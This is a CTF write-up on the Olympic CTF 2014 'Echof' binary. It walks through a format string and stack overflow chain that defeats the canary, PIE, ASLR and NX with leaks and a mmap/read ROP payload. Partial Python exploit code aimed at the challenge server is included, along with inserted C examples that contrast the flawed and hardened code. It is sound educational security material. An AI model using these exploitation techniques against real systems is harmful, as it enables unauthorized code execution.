Olympic CTF 2014 Echof writeup (Alternatives' Blog, Team Alternatives, 2014-02-10) <div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">A simple x86 ELF binary is given. The program uses every available mitigation: stack canary, NX and PIE, and the server has ASLR enabled.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="imageblock" style="background-color: transparent; border: 1px solid rgb(221, 221, 221); display: inline-block; font-size: 9pt; height: auto; line-height: 1.5; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile5.uf.tistory.com/original/2546AF5052F8B8EC2F85F7" rel="lightbox" target="_blank"><img height="92" src="http://cfile5.uf.tistory.com/image/2546AF5052F8B8EC2F85F7" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">However, a quick analysis shows that the binary has a one-byte buffer overflow: the byte written as the string's NULL terminator lands one past the buffer and overwrites the low byte of the format string pointer with NULL. This leads the program into a format string bug.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="imageblock" style="background-color: transparent; border: 1px solid rgb(221, 221, 221); display: inline-block; font-size: 9pt; height: auto; line-height: 1.5; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile29.uf.tistory.com/original/233A993D52F8B77F06A653" rel="lightbox" target="_blank"><img height="697" src="http://cfile29.uf.tistory.com/image/233A993D52F8B77F06A653" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">However, the program filters the 'n' character, so we cannot use the format string bug to overwrite arbitrary memory directly. But since the format string content on the heap (0x11111000) is copied into a stack buffer with "sprintf", we can trigger a stack-based buffer overflow by supplying a format that expands to a long output, such as "%1000c". In this way we can overwrite the stack far beyond the return address, and from here on the task is a classic stack-based buffer overflow. Unfortunately the situation is more complex: we need to defeat a number of security technologies using a single small weapon, memory leaking through the format string bug.</span></div>
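<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
The two defects described above, modelled in C as an added example (this is not the challenge binary's source, whose exact frame layout is not given here): a constructed frame image with a 128-byte line buffer followed directly by the 4-byte format string pointer, a copy routine whose off-by-one terminator write clears the pointer's low byte, and the sprintf call that takes user data as its format, each beside a hardened form. The function names, the 128-byte size and the pointer value are assumptions.</div>

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LINE_MAX 128                 /* assumed size of the line buffer */
#define FMT_OFF  LINE_MAX            /* the format pointer sits right after it */
#define FRAME_SZ (LINE_MAX + 4)      /* constructed 32-bit frame image: buffer + pointer */

static uint32_t load_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void store_le32(uint8_t *p, uint32_t v)
{
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff; p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Build the constructed frame image with fmt_ptr stored after the buffer. */
void init_frame(uint8_t frame[FRAME_SZ], uint32_t fmt_ptr)
{
    memset(frame, 0, FRAME_SZ);
    store_le32(frame + FMT_OFF, fmt_ptr);
}

/* Defect 1 (off-by-one): the length check still allows len == LINE_MAX, so
 * the terminator is written at frame[LINE_MAX], which is the low byte of the
 * pointer stored after the buffer. Returns the pointer value afterwards so
 * the damage is observable. */
uint32_t vulnerable_read_line(uint8_t frame[FRAME_SZ], const char *input, size_t len)
{
    if (len > LINE_MAX)
        len = LINE_MAX;              /* should have been LINE_MAX - 1 */
    memcpy(frame, input, len);
    frame[len] = '\0';
    return load_le32(frame + FMT_OFF);
}

/* Hardened: keep one byte for the terminator and refuse anything longer.
 * Returns 0 on success, -1 when the input does not fit. */
int hardened_read_line(uint8_t frame[FRAME_SZ], const char *input, size_t len)
{
    if (len >= LINE_MAX)
        return -1;
    memcpy(frame, input, len);
    frame[len] = '\0';
    return 0;
}

/* Defect 2: input is used as the format and the destination is unbounded,
 * so a single "%1000c" directive expands well past the 128-byte buffer.
 * Shown for contrast only; nothing here calls it. */
void vulnerable_format(char out[LINE_MAX], const char *fmt)
{
    sprintf(out, fmt);
}

/* Hardened: fixed format string, bounded destination. snprintf returns the
 * length the full output would have had, so the caller can detect truncation. */
int hardened_format(char out[LINE_MAX], const char *text)
{
    return snprintf(out, LINE_MAX, "%s", text);
}
```

<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
The hardened copy rejects any line that leaves no room for the terminator, and the hardened formatter passes user data only as an argument to a fixed "%s" format with a bounded destination, which closes both the pointer corruption and the overflow path that "%1000c" takes.</div>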
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">These are the opponents.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
- Stack Protector (Canary)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
- Never eXecute (NX)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">- Position Independent Executable (PIE)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
- Address Space Layout Randomization (ASLR)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
These are the constraints that need to be considered.</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
- ASCII armor (we can't send NULL bytes, which are essential for exploitation)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
- 'n' filtering (the program filters this character)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
Now let's debug the binary using gdb. Since the binary runs wrapped by a super daemon, we need to attach the debugger to the running process.</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"><br /></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span class="imageblock" style="border: 1px solid rgb(221, 221, 221); display: inline-block; height: auto; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile2.uf.tistory.com/original/2105544F52F8CE861AE7AC" rel="lightbox" target="_blank"><img height="314" src="http://cfile2.uf.tistory.com/image/2105544F52F8CE861AE7AC" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<b>Stage 1. Defeating <span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Stack Protector (Canary)</span></b></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
We can defeat the canary protection using two features. </div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
1<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">. Using the </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">memory leaking capability, we can obtain the canary value from the stack with </span><span style="background-color: transparent; font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;">'%78$X'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">2. We can write a NULL byte using "%c" with a NULL argument that sprintf takes from the stack.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Note that the lowest byte of the canary is always NULL, so we can't write the canary value onto the stack directly (our input cannot contain NULL bytes). However, if a NULL value already sits on the stack as the Nth argument of sprintf, we can consume it with the "%N$c" format and emit a NULL byte at whatever position we want. So if the canary value is "0x41424300" and the second argument of sprintf (taken as a char) is NULL, we can use a format string such as "%2$cCBA" to reproduce it. Thus we can overwrite the return address area beyond the stack protector and then restore the canary value to its original.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<div style="padding-bottom: 0px !important; padding-top: 0px !important;">
<b style="background-color: transparent; font-size: 9pt; line-height: 1.5;"><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Stage 2. Defeating </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">PIE, </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">ASLR</span></b></div>
</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">We need to use ROP to defeat NX. However, solving this is a pain in the ass since the task binary is PIE with ASLR enabled. We could still calculate the address of the executable segment, because a function address from the executable was sitting right after the return address. Using this address as a baseline, we can calculate the address of any instruction in the executable. However, the offsets to libc functions cannot be calculated this way, since they differ between OS and libc versions. Note that even if we know the PLT and GOT sections of the executable, we cannot use the PLT and GOT values to obtain libc function addresses such as mprotect, mmap or system, since the executable is PIE (I didn't know this until facing this task). However, after understanding how functions are addressed in a PIE binary, I figured out a way to calculate the exact libc function address simply by using the "%s" format string.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"><br /></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">- First, obtain the PIE base address from the executable's function address found on the stack.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">- Second, calculate the address of "call mmap" instruction in the main function.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">- Third, read the 4-byte relative offset of the "call mmap" instruction by using "%s", feeding it the address calculated in the previous step + 1 (the byte right after the 0xe8 opcode) as its argument.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
- Fourth, add the relative offset to the instruction address + 4</div>
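<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
The address arithmetic of the four steps above, as an added example in C that is not part of the original writeup: recovering the PIE base from a leaked code address, decoding the rel32 displacement of an E8 call into the callee address (from the whole instruction, or from just the four displacement bytes read after the opcode as in step three), and a scan that lists the call targets in a dumped code image. The addresses and code bytes used in the comments and checks are constructed; the 0xC10 offset is the one the exploit below uses.</div>

```c
#include <stdint.h>
#include <stddef.h>

/* Recover the image base from a leaked code address when the function's
 * offset inside the unrelocated ELF is known (the exploit uses 0xC10). */
uint32_t pie_base(uint32_t leaked_addr, uint32_t known_offset)
{
    return leaked_addr - known_offset;
}

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Decode a 5-byte "E8 rel32" call located at call_addr. rel32 is a signed
 * displacement from the end of the instruction, so the callee is
 * call_addr + 5 + rel32; uint32_t arithmetic wraps exactly like a 32-bit
 * CPU, which also covers negative displacements. Returns 1 and sets
 * *target on success, 0 if the first byte is not the E8 call opcode. */
int call_target(uint32_t call_addr, const uint8_t insn[5], uint32_t *target)
{
    if (insn[0] != 0xE8)
        return 0;
    *target = call_addr + 5 + le32(insn + 1);
    return 1;
}

/* Same computation when only the four displacement bytes were read,
 * starting at rel_addr = call_addr + 1 (the byte after the opcode):
 * the callee is rel_addr + 4 + rel32. */
uint32_t call_target_from_rel(uint32_t rel_addr, const uint8_t rel[4])
{
    return rel_addr + 4 + le32(rel);
}

/* Scan a code image loaded at image_addr for E8 calls and collect their
 * targets. This is a byte-pattern scan, not a disassembler: an 0xE8 byte
 * inside another instruction's immediate would be reported as well, so
 * confirm hits against a real disassembly. Returns the number stored. */
size_t find_calls(uint32_t image_addr, const uint8_t *code, size_t n,
                  uint32_t *targets, size_t max_targets)
{
    size_t found = 0;
    for (size_t i = 0; i + 5 <= n && found < max_targets; i++) {
        if (call_target(image_addr + i, code + i, &targets[found])) {
            found++;
            i += 4;                  /* skip the displacement bytes just decoded */
        }
    }
    return found;
}
```

<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
Because rel32 is relative to the end of the 5-byte instruction, reading the displacement from the call address + 1 and adding 4 gives the same result as adding 5 to the call address itself, which is where the "+ 4" in the fourth step comes from.</div>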
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span class="imageblock" style="border: 1px solid rgb(221, 221, 221); display: inline-block; height: auto; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile28.uf.tistory.com/original/240A984F52F8CE86172D3E" rel="lightbox" target="_blank"><img height="382" src="http://cfile28.uf.tistory.com/image/240A984F52F8CE86172D3E" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span class="imageblock" style="background-color: transparent; border: 1px solid rgb(221, 221, 221); display: inline-block; font-size: 9pt; height: auto; line-height: 1.5; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile25.uf.tistory.com/original/2357B03D52F8B7813AF11E" rel="lightbox" target="_blank"><img height="241" src="http://cfile25.uf.tistory.com/image/2357B03D52F8B7813AF11E" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
In this way, it was possible to calculate the exact addresses of the libc functions used from the main function, regardless of the server environment!</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<b>Stage 3. <span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Defeating The </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Never eXecute (NX)</span></b></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
Now the challenging part is finally over. After calculating the addresses of the "mmap" and "read" functions used in main, solving the task was only a matter of time. At this point NX can be bypassed easily with a two-stage ROP payload.</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"><br /></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"><b>[&mmap][&pppr][0x11111000][0x13001][7][32][-1][0][DEADBEEF][&read][0][0x11111001][0x101]</b></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
The scenario is as follows.</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
1. return to mmap and allocate RWX memory at location 0x11111000</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
2. return to ESP lifting gadget (add esp, 0x14; pop; pop; ret)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
3. return to read</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">4. return to 0x11111000</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"><br /></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">This is a classic ROP exploit which allocates RWX memory, receives the shellcode into it and returns to the shellcode.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
I prepared this ROP stack payload like this...</div>
<div style="background-color: white; clear: none; color: #666666; float: none; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important; text-align: center;">
<span class="imageblock" style="border: 1px solid rgb(221, 221, 221); display: inline-block; height: auto; margin: 5px 0px; padding: 5px; width: 630px;"><span dir="http://cfile9.uf.tistory.com/original/2602EB3D52F8B780242864" rel="lightbox" target="_blank"><img height="367" src="http://cfile9.uf.tistory.com/image/2602EB3D52F8B780242864" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
and then restored the stack protector...</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="imageblock" style="border: 1px solid rgb(221, 221, 221); display: inline-block; height: auto; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile22.uf.tistory.com/original/2265E53D52F8B780336659" rel="lightbox" target="_blank"><img height="464" src="http://cfile22.uf.tistory.com/image/2265E53D52F8B780336659" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">and returned from the main function.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
Right after getting a shell in my local environment, it was possible to get a shell from the task server.</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="imageblock" style="background-color: transparent; border: 1px solid rgb(221, 221, 221); display: inline-block; font-size: 9pt; height: auto; line-height: 1.5; margin: 5px 0px; padding: 5px; width: 397px;"><span dir="http://cfile28.uf.tistory.com/original/2408763D52F8B78120A424" rel="lightbox" target="_blank"><img height="196" src="http://cfile28.uf.tistory.com/image/2408763D52F8B78120A424" style="background-color: transparent; border: 0px; font-size: 9pt; line-height: 1.5;" width="397" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Unfortunately I solved the task after the CTF was over. The task was difficult since I had no background in PIE executables. Below is the final exploit.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"><br /></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;"># final exploit (python)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">from socket import *</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">from struct import *</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">import sys, os, time, base64, ctypes</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">''' game start! '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s = socket(AF_INET, SOCK_STREAM)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">#s.connect( ('localhost', 33000) )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.connect( ('109.233.61.11', 3129) )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print r</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send('letmein\n')</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print r</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">raw_input()</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">''' stage 1 '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># get canary, piebase</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">canary = 0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">piebase = 0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap=0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read=0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">pppr=0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p_mmap=0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># addr of mmap pointer</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p_read=0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># addr of read pointer</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p1 = '%78$X.%79$X.'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p1 += 'A'*(128-len(p1))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'len : ' + str(len(p1))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( p1 )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">canary = int(r.split('.')[0], 16)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">piebase = int(r.split('.')[1], 16) - 0xC10</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">pppr = piebase + 0x95F</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p_mmap = piebase + 0xAE6</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p_read = piebase + 0xA79</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'canary : {0}'.format(hex(canary))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'piebase : {0}'.format(hex(piebase))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'pppr : {0}'.format(hex(pppr))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'p_mmap : {0}'.format(hex(p_mmap))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'p_read : {0}'.format(hex(p_read))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
